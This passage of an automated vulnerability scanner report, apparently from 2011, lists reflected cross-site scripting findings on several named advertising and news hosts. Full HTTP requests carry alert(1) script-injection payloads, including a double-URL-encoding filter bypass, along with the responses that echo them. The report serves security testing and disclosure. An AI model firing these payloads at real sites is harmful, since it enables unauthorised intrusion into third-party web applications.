The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 4eca2<script>alert(1)</script>359798be485 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=&nbh=&rand_spn=5&st=event4eca2<script>alert(1)</script>359798be485&jsonsp=jsp_0 HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:21 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 24
ETag: "0194a4c93866eccde160f1035af0809f"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: 5bfc14f4ea2617979a6a978686383b96c0f6e602
Z-REQUEST-HANDLED-BY: www2
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 131

{"rsp":{"status":"failed","msg":"Invalid search: event4eca2<script>alert(1)</script>359798be485 is not a valid search category."}}

2.40. http://go.savannahnow.com/partner_json/search [when parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the when request parameter is copied into the HTML document as plain text between tags. The payload 981f1<script>alert(1)</script>87e3a8b3059 was submitted in the when parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=981f1<script>alert(1)</script>87e3a8b3059&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:20 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 13
ETag: "6986547c32d2f6c71a345b5533518c4f"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: ac041bd2a8770ddbb4df97f54f3d6fc3eb49d0b7
Z-REQUEST-HANDLED-BY: www29
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 464

{"rsp":{"status":"failed","msg":"Unrecognized date format: 981f1<script>alert(1)</script>87e3a8b3059 is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'>
...[SNIP]...

2.41. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 201ed"-alert(1)-"075db5ed9f was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C201ed"-alert(1)-"075db5ed9f HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 581

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...
QMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C201ed"-alert(1)-"075db5ed9f' width='300' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

2.42. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39080"-alert(1)-"bab3b8cff84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C&39080"-alert(1)-"bab3b8cff84=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:40 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831720_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:40 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 585

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...
MIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C&39080"-alert(1)-"bab3b8cff84=1' width='300' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

2.43. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4e58"-alert(1)-"f14e903ca51 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpagef4e58"-alert(1)-"f14e903ca51&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 582

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpagef4e58"-alert(1)-"f14e903ca51&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit
...[SNIP]...

2.44. http://js.revsci.net/gateway/gw.js [bpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the bpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db834'%3balert(1)//bfe5e4d0684 was submitted in the bpid parameter. This input was echoed as db834';alert(1)//bfe5e4d0684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?csid=G07610&bpid=S0277db834'%3balert(1)//bfe5e4d0684 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 12 Sep 2011 12:48:26 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 13 Sep 2011 12:48:26 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:48:26 GMT
Content-Length: 6077

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
i>>18))+"%"+_rsiCa(0x80+(i>>12&0x3F))+"%"+_rsiCa(0x80+(i>>6&0x3F))+"%"+_rsiCa(0x80+(i&0x3F));}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].DM_addEncToLoc("bpid",'S0277db834';alert(1)//bfe5e4d0684');else DM_addEncToLoc("bpid",'S0277db834';alert(1)//bfe5e4d0684');
function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChil
...[SNIP]...

2.45. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e011b<script>alert(1)</script>84c98d127a9 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07610e011b<script>alert(1)</script>84c98d127a9&bpid=S0277 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 12 Sep 2011 12:48:26 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 13 Sep 2011 12:48:26 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:48:25 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07610E011B<SCRIPT>ALERT(1)</SCRIPT>84C98D127A9" was not recognized.
*/

2.46. http://metrics.impactengine.com/rest/reveal/129534/5011/Expand_Content [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.impactengine.com
Path:   /rest/reveal/129534/5011/Expand_Content

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff9a5%253cscript%253ealert%25281%2529%253c%252fscript%253ec42ce07177e was submitted in the REST URL parameter 3. This input was echoed as ff9a5<script>alert(1)</script>c42ce07177e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rest/reveal/129534ff9a5%253cscript%253ealert%25281%2529%253c%252fscript%253ec42ce07177e/5011/Expand_Content?invalidate=1315849766118 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:17 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 104
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><reveal>    <success id='129534ff9a5<script>alert(1)</script>c42ce07177e' /></reveal></rsp>

2.47. http://metrics.impactengine.com/rest/view/129534/5011/0 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.impactengine.com
Path:   /rest/view/129534/5011/0

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 282db%253cscript%253ealert%25281%2529%253c%252fscript%253eec15e8ec8fe was submitted in the REST URL parameter 3. This input was echoed as 282db<script>alert(1)</script>ec15e8ec8fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rest/view/129534282db%253cscript%253ealert%25281%2529%253c%252fscript%253eec15e8ec8fe/5011/0?invalidate=1315849757167 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:03 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 110
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><mouse_over>    <success id='129534282db<script>alert(1)</script>ec15e8ec8fe' /></mouse_over</rsp>

2.48. http://metrics.impactengine.com/rest/view/129534/5011/30 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.impactengine.com
Path:   /rest/view/129534/5011/30

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3bc3b%253cscript%253ealert%25281%2529%253c%252fscript%253e5e97cebc5eb was submitted in the REST URL parameter 3. This input was echoed as 3bc3b<script>alert(1)</script>5e97cebc5eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rest/view/1295343bc3b%253cscript%253ealert%25281%2529%253c%252fscript%253e5e97cebc5eb/5011/30?invalidate=1315849787169 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:21 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 110
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><mouse_over>    <success id='1295343bc3b<script>alert(1)</script>5e97cebc5eb' /></mouse_over</rsp>

2.49. http://ms0.erovinmo.com/keywords/instrument.js [jsoncallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ms0.erovinmo.com
Path:   /keywords/instrument.js

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 2605f<script>alert(1)</script>490f7962273 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /keywords/instrument.js?jsoncallback=JSONPCallback_02605f<script>alert(1)</script>490f7962273&rewrite=1&user=7DT4-LSd0UCS83EGURP5H.20110912T174842&referrer=http%3A//drupal.org/cases&href=http%3A//www.nowpublic.com/&appCodeName=Mozilla&appMinorVersion=undefined&appName=Netscape&appVersion=5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&cpuClass=undefined&platform=Win32&systemLanguage=undefined&userAgent=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&userLanguage=undefined&client_timestamp=1315849722.416&target=http%3A%2F%2Fwww.nowpublic.com%2F&site_guid=eba178ba8c951c7df3db8e30420828b4a944a1f6bfefa3cab333d20c7be54610&demo_mode=false HTTP/1.1
Host: ms0.erovinmo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:45:52 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
ETag: "eb9171331ec7a7070901e13e357378cd"
X-Runtime: 52
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 159
Status: 200
Content-Type: text/javascript; charset=utf-8

JSONPCallback_02605f<script>alert(1)</script>490f7962273({"blacklists":[],"xpaths":["//div[@class='content-text']"],"message":"new page re-instrumenting: ok"})

2.50. http://ms4.erovinmo.com/keywords/instrument.js [jsoncallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ms4.erovinmo.com
Path:   /keywords/instrument.js

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 97df2<script>alert(1)</script>c347156b75c was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /keywords/instrument.js?jsoncallback=JSONPCallback_097df2<script>alert(1)</script>c347156b75c&rewrite=1&user=7DT4-LSd0UCS83EGURP5H.20110912T174842;%20s_cc=true;%20s_sq=%5B%5BB%5D%5D;%20__utma=71223567.258103543.1315849717.1315849717.1315849717.1;%20__utmb=71223567.2.10.1315849717;%20__utmc=71223567;%20__utmz=71223567.1315849717.1.1.utmcsr=drupal.org&referrer=http%3A//www.nowpublic.com/&href=http%3A//www.nowpublic.com/&appCodeName=Mozilla&appMinorVersion=undefined&appName=Netscape&appVersion=5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&cpuClass=undefined&platform=Win32&systemLanguage=undefined&userAgent=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&userLanguage=undefined&client_timestamp=1315850026.67&target=http%3A%2F%2Fwww.nowpublic.com%2F&site_guid=eba178ba8c951c7df3db8e30420828b4a944a1f6bfefa3cab333d20c7be54610&demo_mode=false HTTP/1.1
Host: ms4.erovinmo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _lsx0=2MCV-LSx0ZOAPAI0GDGJ7

Response

HTTP/1.1 200 OK
